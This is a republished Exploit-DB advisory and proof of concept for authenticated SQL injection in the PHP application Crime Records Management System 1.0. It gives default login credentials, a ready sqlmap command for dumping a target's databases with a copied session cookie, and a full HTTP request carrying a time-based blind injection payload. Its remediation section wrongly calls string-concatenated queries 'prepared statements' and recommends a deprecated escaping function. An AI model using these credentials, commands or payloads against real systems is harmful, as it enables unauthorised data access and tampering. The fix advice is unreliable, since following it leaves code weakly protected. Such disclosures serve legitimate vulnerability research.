Crime records Management System 1.0 – ‘Multiple’ SQL Injection (Authenticated)

• Exploit Database
• 35 阅读

• 作者： Davide Taraschi
  日期： 2021-08-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50213/

• # Exploit Title: Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)
  # Date: 17/08/2021
  # Exploit Author: Davide 't0rt3ll1n0' Taraschi 
  # Vendor Homepage: https://www.sourcecodester.com/users/osman-yahaya
  # Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
  # Version: 1.0
  # Testeted on: Linux (Ubuntu 20.04) using LAMPP
  
  ## Impact:
   An authenticated user may be able to read data for which is not authorized, tamper with or destroy data, or possibly even read/write files or execute code on the database server. 
  
  ## Description: 
   All four parameters passed via POST are vulnerable:
   `fname` is vulnerable both to boolean-based blind and time-based blind SQLi
   `oname` is vulnerable both to boolean-based blind and time-based blind SQLi
   `username` is only vulnerable to time-based blind SQLi
   `status` is vulnerable both to boolean-based blind and time-based blind SQLi 
  
  ## Remediation:
  Here is the vulnerable code:
  
  if($status==''){
  mysqli_query($dbcon,"update userlogin set surname='$fname', othernames='$oname' where staffid='$staffid'")or die(mysqli_error());
  }
  if(!empty($status)){
  mysqli_query($dbcon,"update userlogin set surname='$fname',status='$status', othernames='$oname' where staffid='$staffid'")or die(mysqli_error());
  }
  
  As you can see the parameters described above are passed to the code without being checked, this lead to the SQLi.
  To patch this vulnerability, i suggest to sanitize those variables via `mysql_real_escape_string()` before being passed to the prepared statement.
  
  ## Exploitation through sqlmap
  1) Log into the application (you can try the default creds 1111:admin123)
  2) Copy your PHPSESSID cookie
  3) Launch the following command:
  sqlmap --method POST -u http://$target/ghpolice/admin/savestaffedit.php --data="fname=&oname=&username=&status=" --batch --dbs --cookie="PHPSESSID=$phpsessid"
  replacing $target with your actual target and $phpsessid with the cookie that you had copied before
  
  ## PoC:
  Request:
  POST /ghpolice/admin/savestaffedit.php HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
  Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
  Accept-Encoding: gzip, deflate
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 77
  Origin: http://localhost
  DNT: 1
  Connection: close
  Referer: http://localhost/ghpolice/admin/user.php
  Cookie: PHPSESSID=f7123ac759cd97868df0f363434c423f
  Upgrade-Insecure-Requests: 1
  Sec-Fetch-Dest: document
  Sec-Fetch-Mode: navigate
  Sec-Fetch-Site: same-origin
  Sec-Fetch-User: ?1
  
  fname=' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- &oname=&username=&status=
  
  And after 5 seconds we got:
  
  HTTP/1.1 200 OK
  Date: Tue, 17 Aug 2021 14:28:59 GMT
  Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1
  X-Powered-By: PHP/7.4.22
  Content-Length: 1074
  Connection: close
  Content-Type: text/html; charset=UTF-8
  
   <!DOCTYPE html>
   etc...